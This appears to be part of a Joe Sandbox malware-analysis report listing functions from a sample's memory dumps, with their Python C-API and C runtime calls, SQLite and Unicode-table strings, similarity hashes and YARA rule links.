Opcode Fuzzy Hash: 61c017c81d5e6fa3815ca9fce73e5b847532078dee348fb6f530cef8c5aad8c5
Instruction Fuzzy Hash: E901E5B6A8BA5681FA175BADEC502B5A6B1AB04B91F44E035CE2D073B0DE3DE4819300

Function 00007FFBAB6B33A3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B33C2
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B33E0
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B33FA

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 3307c57545eb4b4e003a50abc7e3a22bbca76da34ce5ed7b4551bd04aed3351c
Instruction ID: 94d414ea2201f1a63cb727a23c775e563241e21acd7a1322ea95665f9672f622
Opcode Fuzzy Hash: 3307c57545eb4b4e003a50abc7e3a22bbca76da34ce5ed7b4551bd04aed3351c
Instruction Fuzzy Hash: 4001E5B2B8BA5291F7175BBDEC502B9A271BB00B90F44A435CD2E073B0DF3DA4818301

Function 00007FFBAB6B2670 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B268F
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B26AD
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B26C7

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 097e68ef3b6926ae97075bdf610a732ab01175073ea4774d168167745da7d900
Instruction ID: f34eb6024e0dbb750084e04905d79279b796c4da88998fdba8910a5db92396d0
Opcode Fuzzy Hash: 097e68ef3b6926ae97075bdf610a732ab01175073ea4774d168167745da7d900
Instruction Fuzzy Hash: DA01E9F6A8BA0282F6175BA8EC54278A6B1AB44B91F44A434CD2D067B1EE3DE4818741

Function 00007FFBAB6B281F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B283E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B285C
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2876

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 5d81bad33af6d0c6a6d34ccc316adc70e06c6ff90d8471e672fe39720f4c7cf5
Instruction ID: 0d2c9879c812503ac707a3936f6410e182a93534903fc4549493e7638f9e549d
Opcode Fuzzy Hash: 5d81bad33af6d0c6a6d34ccc316adc70e06c6ff90d8471e672fe39720f4c7cf5
Instruction Fuzzy Hash: 2A01E5A2E8BA0681F6075BA9EC50274A6B1AB04B90F44E035CD2D0B3B4DE3DE4858300

Function 00007FFBAB6B2CD6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B2CF5
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2D13
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2D2D

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 24728f44ecafede275bfe5869a5481c6ada5958cbf93234a040fc8aef190d785
Instruction ID: a52704de6adc3981fbd12e5d84983f3e4da468841b88828c35ff1d1b365945fe
Opcode Fuzzy Hash: 24728f44ecafede275bfe5869a5481c6ada5958cbf93234a040fc8aef190d785
Instruction Fuzzy Hash: 4401E9B5A8BA0281FB474BA9DC503B5A6B1AF44B95F44E435CD2E077B1DF3DA4858301

Function 00007FFBAB6B2B3F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B2B5E
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B2B7C
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2B96

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 032ea81c99ec7a83fc9ed446e6799de4a32a2fdf75c6d93fa13489cf3ba9ce95
Instruction ID: b86b3c3f87a4535646d776034566e534507b38fa1be6f27be100d6a01405c1cc
Opcode Fuzzy Hash: 032ea81c99ec7a83fc9ed446e6799de4a32a2fdf75c6d93fa13489cf3ba9ce95
Instruction Fuzzy Hash: 0401E9A5A8BA0281F7175FBDDC50274A6B1AB45BA5F44A039CD2D073B0DE3DA5818701

Function 00007FFBAB6B35F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B35FE
PyObject_Vectorcall.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B3623
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B363A

Strings

<module>, xrefs: 00007FFBAB6B364C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Dealloc$Object_Vectorcall
String ID: <module>
API String ID: 1057673266-217463007
Opcode ID: d65abae93356dae59a4a840aaf2a40b004717b6640a575e0a43327181c576cc2
Instruction ID: 05282e0b4091cf9550d2e5abd95b7c32b57fd14b215a1756e5958a1d89901a35
Opcode Fuzzy Hash: d65abae93356dae59a4a840aaf2a40b004717b6640a575e0a43327181c576cc2
Instruction Fuzzy Hash: 25F06DB6F8B65281EA675FA9EC103B9E271FB40BE1F40E035CE5906A60EE3C95458740

Function 00007FFBAB6A4A30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PyObject_GetAttr.PYTHON312 ref: 00007FFBAB6A4A44
PyErr_Occurred.PYTHON312 ref: 00007FFBAB6A4A87

Part of subcall function 00007FFBAB6A3520: PyObject_IsInstance.PYTHON312 ref: 00007FFBAB6A3530
Part of subcall function 00007FFBAB6A3520: PyObject_CallNoArgs.PYTHON312 ref: 00007FFBAB6A3542
Part of subcall function 00007FFBAB6A3520: PyErr_SetObject.PYTHON312 ref: 00007FFBAB6A3556
Part of subcall function 00007FFBAB6A3520: _Py_Dealloc.PYTHON312 ref: 00007FFBAB6A356A

_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A4A68

Strings

ratio, xrefs: 00007FFBAB6A4A75

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Object_$DeallocErr_$ArgsAttrCallInstanceObjectOccurred
String ID: ratio
API String ID: 1598006454-4234197119
Opcode ID: 35d559fc8b1310c0c6a435b23598347e2ea6a62b98f84bba43c18296abc6ca69
Instruction ID: 137a75b28b6245dfca3a630e2bd2a8887e7d4a1443bf5aa8a3d0490aac05e8bf
Opcode Fuzzy Hash: 35d559fc8b1310c0c6a435b23598347e2ea6a62b98f84bba43c18296abc6ca69
Instruction Fuzzy Hash: 1B01BBA5E8BA0681FE575BBEEC14275E3B0AF44B54F04F439CD2D062B5EE7CA1818704

Function 00007FFBAB6A3800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834
PyErr_Format.PYTHON312 ref: 00007FFBAB6A3860

Strings

%s object expected; and errored formatting real type!, xrefs: 00007FFBAB6A3859
%s object expected; got %U, xrefs: 00007FFBAB6A382D

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_Format
String ID: %s object expected; and errored formatting real type!$%s object expected; got %U
API String ID: 376477240-2630277986
Opcode ID: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
Instruction ID: 684fe1c05f570492ea99a79b823a853b84271491a4e7c56139d9371370ef0fef
Opcode Fuzzy Hash: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
Instruction Fuzzy Hash: 4CF03CB1A1AA4281EE474BAEEDA02B8E2B0FB48BC4F44A035DE2D06675DF6DD5408700

Function 00007FFBAB6B306B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B306B
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3089
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B30A3

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 6d3c8ef61b1ce4c915580a507c35e2098bc8d2d339069acd415264474d36893f
Instruction ID: b197f6bed2e8c03a965bdea6172ca981e4148d83e21149f99d3110e8f7792364
Opcode Fuzzy Hash: 6d3c8ef61b1ce4c915580a507c35e2098bc8d2d339069acd415264474d36893f
Instruction Fuzzy Hash: D5F0E7A1F8BA1281FA175BB9EC502B5B271BF00B91F40A034CD2D066B1EE7DA5858341

Function 00007FFBAA59EB50 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 380COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFBAA59EBA2

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA59ED66
%s at line %d of [%.10s], xrefs: 00007FFBAA59ED7F
database corruption, xrefs: 00007FFBAA59ED73

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcmp
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 1475443563-3418467682
Opcode ID: 409bf4b4490d964f91b512375946b67e65f21b136b0b9dda1bf3d0e7d8408f83
Instruction ID: 459b690db561f1f905cb31a47e6c53c4f29aa998aebb82c84bbf4126b7d3fa04
Opcode Fuzzy Hash: 409bf4b4490d964f91b512375946b67e65f21b136b0b9dda1bf3d0e7d8408f83
Instruction Fuzzy Hash: 54F18CB2B05742DBEB218B76C5806AD37A9FB05B88B004075DF0DABB84DF38E816C754

Function 00007FFBAA5E2940 Relevance: 6.3, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5E29A0
memcpy.VCRUNTIME140 ref: 00007FFBAA5E29B5
memcpy.VCRUNTIME140 ref: 00007FFBAA5E29D9
memcpy.VCRUNTIME140 ref: 00007FFBAA5E29F8
memcpy.VCRUNTIME140 ref: 00007FFBAA5E2A10

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy$memset
String ID:
API String ID: 438689982-0
Opcode ID: cc4712f8e957dd4317e1a856f1be935244d956fb36af113a7da43f43788141d5
Instruction ID: 832f670e7932a286d9dc1bbc631d027e409d69247b13c4271927802950a46de2
Opcode Fuzzy Hash: cc4712f8e957dd4317e1a856f1be935244d956fb36af113a7da43f43788141d5
Instruction Fuzzy Hash: BC218EA261A742C3DA259B2AF5410BAB3A5FF45BC0B046171DF8E47F5ADF2CE4928610

Function 00007FFBAA58EEA0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA58EF2C

Strings

readonly_shm, xrefs: 00007FFBAA58F0CA
winOpenShm, xrefs: 00007FFBAA58F139
%s-shm, xrefs: 00007FFBAA58EF43

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: %s-shm$readonly_shm$winOpenShm
API String ID: 2221118986-2815843928
Opcode ID: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
Instruction ID: be5ca83905eb7e0df3b0a1982978b3dae021b1baea6cdb5cec3d190a4c6a6527
Opcode Fuzzy Hash: b07afea1859578fd4e42ec8a61cd900611d4e10773127c8a3f1c7d01da6d0bac
Instruction Fuzzy Hash: 1DC1A0A1A0FB42C5FA568B76E85067873A8FF49B80F0411B5DD5E43690DF3CE44AE720

Function 00007FFBAA5A0920 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA5A0B49

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA5A09D7, 00007FFBAA5A0B6D
%s at line %d of [%.10s], xrefs: 00007FFBAA5A09EF, 00007FFBAA5A0B86
database corruption, xrefs: 00007FFBAA5A09E3, 00007FFBAA5A0B7A

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 2221118986-3418467682
Opcode ID: 32bab25185db5cd73c33ce9707f9a1cf8e9a927a2b0a63cd242fbe127e798c5a
Instruction ID: 596d36c56aa4a69f9e0de99c4446f67f66d98919578ebe391b982d32968e0018
Opcode Fuzzy Hash: 32bab25185db5cd73c33ce9707f9a1cf8e9a927a2b0a63cd242fbe127e798c5a
Instruction Fuzzy Hash: F78145A3B1A1D18DE3528E39D0545BE3AD8E702791F0581BAEECA473C1DA3CD987D724

Function 00007FFBAA607390 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

%s.%s, xrefs: 00007FFBAA60750E
rowid, xrefs: 00007FFBAA6074EE
column%d, xrefs: 00007FFBAA607598

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: %s.%s$column%d$rowid
API String ID: 0-1505470444
Opcode ID: e4f89ea7a6944ccff559c56623e0758bdc567d60555918777054569768464e1a
Instruction ID: 86a9729de075f959284c165b586dc94becb5ae3bfbedcacc693c025d579f7298
Opcode Fuzzy Hash: e4f89ea7a6944ccff559c56623e0758bdc567d60555918777054569768464e1a
Instruction Fuzzy Hash: F891D1A2A0AB81D1EA62CB29D8443A977A8FB45FA4F049375DE6D577D0DF3CD082C710

Function 00007FFBAA461FD0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA462008
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA462026

Strings

CJK UNIFIED IDEOGRAPH-, xrefs: 00007FFBAA46201C
HANGUL SYLLABLE , xrefs: 00007FFBAA461FF5

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: strncmp
String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
API String ID: 1114863663-87138338
Opcode ID: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
Instruction ID: 15975c0cb5798efb3b96371d08c8b5dbea49a84011d11c958104b92cfa2d6cc6
Opcode Fuzzy Hash: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
Instruction Fuzzy Hash: 4461FAB2F1A642D6E7658A35E4006BAB25AFF80F90F444275FE5947AC5DF3CE4038710

Function 00007FFBAA59A110 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 139COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FFBAA59A238

Strings

2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0, xrefs: 00007FFBAA59A2F2
%s at line %d of [%.10s], xrefs: 00007FFBAA59A30B
database corruption, xrefs: 00007FFBAA59A2FF

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memset
String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
API String ID: 2221118986-3418467682
Opcode ID: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
Instruction ID: 84f2d8fd0f85e8d95af20e65da3de676f39bd78ba1370fdee853b09a952db892
Opcode Fuzzy Hash: b2ad27d075e7604b728f310a1672e8df9373334c1e65e28f0ea737e03c5a8063
Instruction Fuzzy Hash: 4D51DC7260AB42D6EB56CB25E5806AD73A8FB49B84F144072EF4C47754EF39E453C328

Function 00007FFBAA5AF030 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FFBAA5AF163

Strings

, xrefs: 00007FFBAA5AF182
-, xrefs: 00007FFBAA5AF147
%!.15g, xrefs: 00007FFBAA5AF1AC

Memory Dump Source

Source File: 00000002.00000002.1832549392.00007FFBAA581000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA580000, based on PE: true

Associated: 00000002.00000002.1832522043.00007FFBAA580000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832764653.00007FFBAA6DA000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa580000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy
String ID: $%!.15g$-
API String ID: 3510742995-875264902
